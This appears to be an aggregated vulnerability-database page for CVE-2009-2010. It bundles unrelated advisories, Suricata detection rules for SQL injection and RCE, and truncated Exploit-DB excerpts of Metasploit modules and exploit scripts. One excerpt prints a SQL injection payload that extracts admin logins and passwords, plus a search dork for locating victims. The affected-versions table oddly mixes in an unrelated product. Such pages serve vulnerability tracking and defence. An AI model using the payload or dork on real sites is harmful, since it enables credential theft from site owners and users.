CVE-2009-2010
Published: 2009-06-08
Priority: P4 33 medium · CVSS 2.0: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
EXPLOIT
EPSS: 0.90% (55.2th percentile)
Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.
Affected (11 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| g.rodola | pyftpdlib | >= 0 < 0.5.1 | 0.5.1 |
| haudenschilt | family_connections_cms | <= 1.9 | — |
| haudenschilt | family_connections_cms | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| ghsa | — | 4.3 | MEDIUM | — |
| vendor_cisco | — | 7.8 | HIGH | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
GHSA-jhh8-5vg7-8rmx: Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1
ghsa_unreviewed · 2022-05-02 · CVE-2009-2010 [MEDIUM] CWE-89
Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.
GHSA
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') in pyftpdlib
ghsa · 2022-05-02 · CVSS 4.3 · CVE-2009-5010 [MEDIUM] CWE-362
Race condition in the FTPHandler class in ftpserver.py in pyftpdlib before 0.5.1 allows remote attackers to cause a denial of service (daemon outage) by establishing and then immediately closing a TCP connection, leading to the accept function having an unexpected return value of None, a different vulnerability than CVE-2010-3494.
Cisco
Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerabilities
vendor_cisco · 2010-09-22 · CVSS 7.8 · CVE-2009-2051 [HIGH] CWE-399
Multiple vulnerabilities exist in the Session Initiation Protocol (SIP) implementation in Cisco IOS® Software that could allow an unauthenticated, remote attacker to cause a reload of an affected device when SIP operation is enabled.
Cisco has released software updates that address these vulnerabilities. There are no workarounds for devices that must run SIP; however, mitigations are available to limit exposure to the vulnerabilities.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20100922-sip.
Note: The September 22, 2010, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. Five of the advisories
Red Hat
pcsc-lite: Privilege escalation via specially-crafted client to PC/SC Smart Card daemon messages
vendor_redhat · 2010-06-10 · CVSS 6.8 · CVE-2009-4902 [MEDIUM] CWE-228
Buffer overflow in the MSGFunctionDemarshall function in winscard_svc.c in the PC/SC Smart Card daemon (aka PCSCD) in MUSCLE PCSC-Lite 1.5.4 and earlier might allow local users to gain privileges via crafted SCARD_CONTROL message data, which is improperly demarshalled. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-0407.
Statement: Not vulnerable. This issue did not affect the versions of pcsc-lite as shipped with Red Hat Enterprise Linux 5.
Package: pcsc-lite (Red Hat Enterprise Linux 5) - Affected
Package: pcsc-lite (Red Hat Enterprise Linux 6) - Affected
Red Hat
texlive: Buffer overflow flaw by processing virtual font files
vendor_redhat · 2010-03-25 · CVSS 6.8 · CVE-2010-0827 [MEDIUM]
Integer overflow in dvips in TeX Live 2009 and earlier, and teTeX, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted virtual font (VF) file associated with a DVI file.
Red Hat
libESMTP: Multiple certificate validation flaws
vendor_redhat · 2010-03-03 · CVSS 5.9 · CVE-2010-1192 [MEDIUM]
libESMTP, probably 1.0.4 and earlier, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
Package: libesmtp (Red Hat Enterprise Linux 6) - Affected
BSD
FreeBSD-SA-10:02.ntpd: ntpd mode 7 denial of service
bsd_advisories · 2010-01-06 · CVSS 6.4 · CVE-2009-3563 [MEDIUM]
FreeBSD-SA-10:02.ntpd Security Advisory
The FreeBSD Project
Topic: ntpd mode 7 denial of service
Category: contrib
Module: ntpd
Announced: 2010-01-06
Affects: All supported versions of FreeBSD.
Corrected: 2010-01-06 21:45:30 UTC (RELENG_8, 8.0-STABLE)
           2010-01-06 21:45:30 UTC (RELENG_8_0, 8.0-RELEASE-p2)
           2010-01-06 21:45:30 UTC (RELENG_7, 7.2-STABLE)
           2010-01-06 21:45:30 UTC (RELENG_7_2, 7.2-RELEASE-p6)
           2010-01-06 21:45:30 UTC (RELENG_7_1, 7.1-RELEASE-p10)
           2010-01-06 21:45:30 UTC (RELENG_6, 6.4-STABLE)
           2010-01-06 21:45:30 UTC (RELENG_6_4, 6.4-RELEASE-p9)
           2010-01-06 21:45:30 UTC (RELENG_6_3, 6.3-RELEASE-p15)
CVE Name: CVE-2009-3563
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please
Suricata
ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection
suricata · 2010-07-30 · CVSS 7.5 · CVE-2009-0296 [HIGH]
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Script Toko Online shop_display_products.php cat_id Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/shop_display_products.php?"; nocase; content:"cat_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; pcre:"/UNION.+SELECT/i"; reference:cve,CVE-2009-0296; reference:url,secunia.com/advisories/33661/; reference:url,milw0rm.com/exploits/7873; classtype:web-application-attack; sid:2009199; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
suricata · 2010-07-30 · CVE-2009-1151
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"c="; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010903; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-11-30 · CVE-2009-4988
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb · 2010-11-11 · CVE-2009-1029
---
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 DATE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted DATE string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-10
Exploit-DB
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
exploitdb · 2010-11-11 · CVE-2009-3031
---
##
# $Id: symantec_consoleutilities_browseandsavefile.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbit
Exploit-DB
MP3-Nator 2.0 - Local Buffer Overflow (SEH)
exploitdb · 2010-11-11 · CVE-2009-2364
---
#!/usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10\11\2010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Writted By C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: [email protected]
#
#
import os,sys
def layout():
os.system("cls")
os.system("color 4f")
print("\n[+]Exploit : Exploit Buffer Overflow MP3-NATOR v2.0")
print("[+]Author : C4SS!0 G0M3S")
print("[+]E-mail : [email protected]")
print("[+]Home : http://www.invasao.com.br")
print("[+]Impact : Hich")
print("[+]Version : 2.0\n")
if len(sys.argv)!=2:
layout()
print("[-]Usage: Exploit.
Exploit-DB
SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)
exploitdb · 2010-11-11 · CVE-2009-3861
---
##
# $Id: safenet_softremote_groupname.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SafeNet SoftRemote GROUPNAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SafeNet SoftRemote
Security Policy Editor MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-3861' ],
[ 'OSVDB', '59660'],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-09-008'
Exploit-DB
libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)
exploitdb · 2010-10-07 · CVSS 7.8 · CVE-2010-2632 [HIGH]
---
Source: http://securityreason.com/securityalert/7822
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote
ftpd-anon) ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 06.11.2009
- - Pub.: 07.10.2010
CVE: CVE-2010-2632
Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)
Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"
and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.co
Exploit-DB
Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)
exploitdb · 2010-09-25 · CVE-2009-0927
---
##
# $Id: adobe_geticon.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe Collab.getIcon() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include MSF_LICENSE,
'Author' =>
[
'MC',
'Didier Stevens ',
'jduck'
],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0927' ],
[ 'OSVDB', '53647' ],
[ 'URL', 'http://www.zerodayin
Exploit-DB
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)
exploitdb · 2010-09-25 · CVE-2009-3459
---
##
# $Id: adobe_flatedecode_predictor02.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe FlateDecode Stream Predictor 02 Integer Overflow',
'Description' => %q{
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe
Acrobat Professional versions before 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'jduck'
],
'Version' => '$Revi
Exploit-DB
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
exploitdb · 2010-09-20 · CVE-2009-2990
---
##
# $Id: adobe_u3d_meshcont.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Description' => %q{
This module exploits an array overflow in Adobe Reader and Adobe Acrobat.
Affected versions include MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano ',
'jduck'
],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2009-2990' ],
[ 'OSVDB', '58920'
Exploit-DB
Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
exploitdb · 2010-08-25 · CVE-2009-3837
---
##
# $Id: eureka_mail_err.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
# bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1
# overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address
'Description' => %q{
This module exploits a buffer overflow in the Eureka Email 2.2q
client that is triggered through an excessively long ERR message.
NOTE: this
Exploit-DB
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)
exploitdb · 2010-07-12 · CVE-2009-3672
---
##
# $Id: ms09_072_style_object.rb 9787 2010-07-12 02:51:50Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
# :rank => LowRanking # exploitable on ie7/vista
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Style
Exploit-DB
IBM Bladecenter Management - Multiple Web Application Vulnerabilities
exploitdb · 2010-07-06 · CVE-2010-2656
---
[DSECRG-09-054] IBM Bladecenter Management - Multiple vulnerabilities
The BladeCenter management module is prone to multiple security vulnerabilities: Unauthorized Access, Directory Listing, XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-054
Application: IBM BladeCenter Management Module
Versions Affected: BPET48L and may be other versions
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS,Directory traversal, Information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
The BladeCenter manage
Exploit-DB
ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)
exploitdb · 2010-07-03 · CVE-2009-3976
---
##
# $Id: proftp_banner.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'ProFTP 2.9 Banner Remote Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in the ProFTP 2.9
client that is triggered through an excessively long welcome message.
},
'Author' => [ 'His0k4 ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2009-3976' ],
[ 'OSVDB', '57394' ],
[ 'URL', 'http://www.labtam-inc.com/index.ph
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb · 2010-07-03 · CVE-2009-3103
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
exploitdb · 2010-06-15 · CVE-2009-0658
---
##
# $Id: adobe_jbig2decode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort
Exploit-DB
Amaya Browser 11.0 - bdo tag Overflow (Metasploit)
exploitdb · 2010-05-09 · CVE-2009-0323
---
##
# $Id: amaya_bdo.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Amaya Browser v11.0 bdo tag overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Amaya v11 Browser.
By sending an overly long string to the "bdo"
tag, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'dookie, original exploit by Rob Carter' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2009
Exploit-DB
BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
exploitdb · 2010-04-30 · CVE-2009-1612
---
##
# $Id: baofeng_storm_onbeforevideodownload.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX
control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing
an overly long string to the method "OnBeforeVideoDownload" an attacker
Exploit-DB
cms (id) 5.0 - SQL Injection
exploitdb · 2010-04-22 · CVE-2009-2439
---
CmS (id) SQL Injection Vulnerability
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
Exploitz:
~~~~~~~
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
Us,lulz...'
-
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn
Exploit-DB
IBM Bladecenter Management Module - Denial of Service
exploitdb · 2010-04-15 · CVE-2010-1460
---
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
Source: http://www.dsecrg.com/pages/vul/show.php?id=149
This device can be remotely rebooted by sending malformed TCP packets
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049
Application: IBM BladeCenter Management Module
Versions Affected: before BPET50G
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: DoS
Exploits: YES
Reported: 24.07.2009
Vendor response: 26.07.2009
Date of Public Advisory: 15.04.2010
Solution: YES
Author: Alexey Sintsov
of Digital Security Research Group [DSecRG]
Description
The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter
chassis management bay. The manageme
Exploit-DB
Adobe (Multiple Products) - XML External Entity / XML Injection
exploitdb · 2010-02-22 · CVSS 6.5 · CVE-2009-3960 [MEDIUM]
---
[ASCII-art banner] presents..
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML E
Exploit-DB
Kaspersky AV 2010 9.0.0.463 - Local Denial of Service
exploitdb · 2009-09-29 · CVE-2009-4114
---
#include
#include
#include
#include
#include
/*
Program : Kaspersky Anti-Virus 2010 9.0.0.463
Homepage : http://www.kaspersky.com
Discovery : 2009/09/29
Author Contacted : 2009/10/01
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]
//----- Application description
The most trusted virus and spyware protection - premium protection
against viruses, spyware, Trojans, worms, bots and more. Also includes
comprehensive phishing and identity theft defense and superfast performance.
//----- Description of vulnerability
kl1.sys driver don't check inputs address of an IOCTL. An exception can be
thrown if we modify one or two DWORDs.
With my test I can't do best exploitation than a BSOD.
//----- Credits
http://
Exploit-DB
Family Connections CMS 1.9 - SQL Injection
exploitdb · 2009-05-13 · CVE-2009-2010
---
#!/usr/bin/perl
# [ASCII-art banner] WEB: http://www.fa
Bugzilla
CVE-2010-2055 CVE-2009-3743 ghostscript various flaws [fedora-all]
bugzilla · 2011-11-22 · CVSS 9.3 · CVE-2010-2055 [CRITICAL]
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in affected Fedora versions.
For comments that are specific to the vulnerability please use bugs filed against "Security Response" product referenced in the "Blocks" field.
For more information see: http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the bug IDs of this bug's parent bugs filed against the "Security Response" product (the top-level CVE bugs). Please mention the CVE IDs being fixed in the RPM changelog when available.
Bodhi update submission link: https://admin.fedoraproject.org/updates/new/?type_=security&bugs=599
Bugzilla
CVE-2009-5017 Firefox: overlong UTF-8 sequence detection problem
bugzilla · 2010-11-23 · CVSS 4.3 · CVE-2009-5017 [MEDIUM]
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-5017 to the following vulnerability:
Mozilla Firefox before 3.6 Beta 3 does not properly handle overlong UTF-8 encoding, which makes it easier for remote attackers to bypass cross-site scripting (XSS) protection mechanisms via a crafted string, a different vulnerability than CVE-2010-1210.
References:
[1] http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html
[2] http://hg.mozilla.org/releases/mozilla-1.9.2/rev/e42c563313a0
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=511859
[4] https://bugzilla.mozilla.org/show_bug.cgi?id=522634
Reference public PoC:
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=511859#c1
Upstream change
Bugzilla
CVE-2010-3170 firefox/nss: doesn't handle IP-based wildcards in X509 certificates safely
bugzilla · 2010-09-03 · CVSS 5.9 · MEDIUM
Richard Moore and Simon Ward reported flaws in the way browsers such
as Firefox handled wildcard characters in the Common Name field of
a certificate. If an attacker is able to obtain a carefully crafted certificate,
signed by a Certificate Authority trusted by Firefox, the attacker could
use that certificate in a man-in-the-middle attack and potentially
confuse Firefox into accepting it by mistake. This is a different vulnerability than
CVE-2009-2408.
References:
[1] http://www.westpoint.ltd.uk/advisories/wp-10-0001.txt
[2] http://bugs.gentoo.org/show_bug.cgi?id=335731
Discussion:
This will be fixed in NSS 3.12.8
---
Mozilla has assigned CVE-2010-3170 identifier to this issue.
Mozilla upstream bug:
[3]
Bugzilla
CVE-2009-4897 ghostscript: long name buffer overflow (GS 8.64)
bugzilla · 2010-07-12 · CVSS 9.3 · CRITICAL
A memory corruption vulnerability caused by long names was discovered [1] in Ghostscript 8.64 and earlier. A specially crafted PDF file could result in the execution of arbitrary code if opened or printed (e.g. via CUPS).
This was corrected in upstream Ghostscript 8.70 [2]; version 8.64 and earlier are affected by this flaw (all the way back to Ghostscript 7.05).
References:
[1] http://bugs.ghostscript.com/show_bug.cgi?id=690523
[2] http://svn.ghostscript.com/viewvc?view=rev&revision=9797
Discussion:
This problem is similar to CVE-2010-1869 (bug #582300) as was noted in oss-security thread:
http://thread.gmane.org/gmane.comp.security.oss.general/3184
(In reply to comment #0)
> This was corrected in upstream Ghostscript
Bugzilla
CVE-2009-4538 kernel: e1000e frame fragment issue
bugzilla · 2009-12-29 · CVSS 10.0 · CRITICAL
Description of problem:
Similar to the second issue that Fab mentioned in his presentation at 26c3, this affects the e1000e driver. See https://bugzilla.redhat.com/show_bug.cgi?id=550907#c0 issue #2 for the description, and this https://bugzilla.redhat.com/show_bug.cgi?id=550907#c4. This bug is filed to make sure we fix this too.
http://www.securityfocus.com/bid/37523
Discussion:
A quick heads up to all the release owners on this bug, the patch I posted upstream for bz 550915 (specifically the e1000 bits) will apply pretty cleanly to e1000e here.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2010:0019 https://rhn.redhat.com/errata/RHSA-2010-0019.html
---
This issue has been addressed
Bugzilla
CVE-2009-0579 pam: MINDAYS not respected by pam for password changing [F10]
bugzilla · 2009-02-24 · CVSS 4.6 · MEDIUM
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=487217,
---
pam-1.0.4-2.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/pam-1.0.4-2.fc9
---
pam-1.0.4-2.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraproject.org/updates/pam-1.0.4-2.fc10
---
pam-1.0.4-2.fc10 has been pushed to the Fedora 10 testing repository. If problems still persist, please make note of it in this bug report.
I
References:
http://secunia.com/advisories/35039
http://www.securityfocus.com/archive/1/503477/100/0/threaded
http://www.securityfocus.com/bid/34935
http://www.vupen.com/english/advisories/2009/1306
https://www.exploit-db.com/exploits/8671
2009-06-08
Published